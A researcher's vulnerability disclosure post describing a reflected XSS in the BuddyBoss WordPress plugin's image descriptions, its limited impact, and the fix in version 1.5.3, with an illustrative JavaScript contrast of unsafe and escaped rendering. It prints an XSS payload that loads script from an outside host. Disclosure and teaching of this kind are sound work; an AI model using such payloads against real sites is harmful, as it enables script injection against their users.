
F[0x05] Reflected XSS in WordPress plugin - BuddyBoss

[Backdated Post] Date of finding: 30/09/2020. Actual date of publication: 25/10/2020.

In this post I will describe a (small) vulnerability I discovered when testing the security of a platform for a non-profit.

The platform in question was BuddyBoss. BuddyBoss serves as an all-in-one plugin for WordPress to ‘Sell memberships, courses, and build online communities’. In essence, BuddyBoss is a collection of plugins with high interoperability.

They pride themselves on their security, so I wasn’t expecting to find much. The fact that I was only able to find a reflected XSS vulnerability in the few hours that I poked around assures me their pride is at least somewhat justified.


The Finding

As described in this issue, the vulnerability can be triggered by entering JavaScript as part of the description of an image. After saving, this description, together with any remotely sourced JavaScript it includes, replaces the previous description in the page without proper sanitization, allowing the JavaScript to run.

```html
<script src=http://xss.rocks/xss.js? >
```

It is not a stored XSS vulnerability, since the description is properly sanitized before it is stored in the database. Upon refreshing the page, the sanitized description is shown instead. All other visitors also only ever see the sanitized version of the description, which greatly limits the impact of this vulnerability.

Remediation

Sanitizing the description before displaying it to the user remediates this vulnerability, as is showcased in the applied fix: the same escaping that already protects the stored copy must also be applied on the output path that writes the freshly entered description back into the page.
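To make the bug and its fix concrete, here is an added example (not BuddyBoss’s own code; the function names and the `media-description` markup are hypothetical) that renders an image description the vulnerable way and the hardened way, using the payload from the finding above as input:

```javascript
// Added example, not code from the BuddyBoss plugin. Function names and the
// surrounding markup are hypothetical; only the payload comes from the post.

// The payload from the finding: a script tag pulling remotely sourced JavaScript.
const PAYLOAD = '<script src=http://xss.rocks/xss.js? >';

// Escape the characters that let untrusted text break out of an HTML text
// node or attribute value. '&' must be replaced first so that the entities
// produced by the later replacements are not double-escaped.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the freshly entered description is interpolated as raw HTML,
// so the browser parses it as markup and the <script> element executes.
function renderDescriptionUnsafe(description) {
  return `<p class="media-description">${description}</p>`;
}

// Hardened: same interpolation, but the description is escaped on output so
// the browser renders the payload as literal text.
function renderDescriptionSafe(description) {
  return `<p class="media-description">${escapeHtml(description)}</p>`;
}

// Crude check used to contrast the two renderers: does the markup still
// contain a <script ...> start tag? A browser's HTML parser is the real
// authority; this regex only serves the demonstration.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// When updating a DOM node directly in the browser, assigning textContent
// never parses markup, which is the preferred fix over innerHTML.
function setDescriptionText(element, description) {
  element.textContent = description;
  return element;
}
```

On the PHP side of a WordPress plugin the same output escaping is what `esc_html()` provides.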

This fix was part of the BuddyBoss 1.5.3 release.

This post is licensed under CC BY 4.0 by the author.
Hell is empty and all the devils are here.
-WS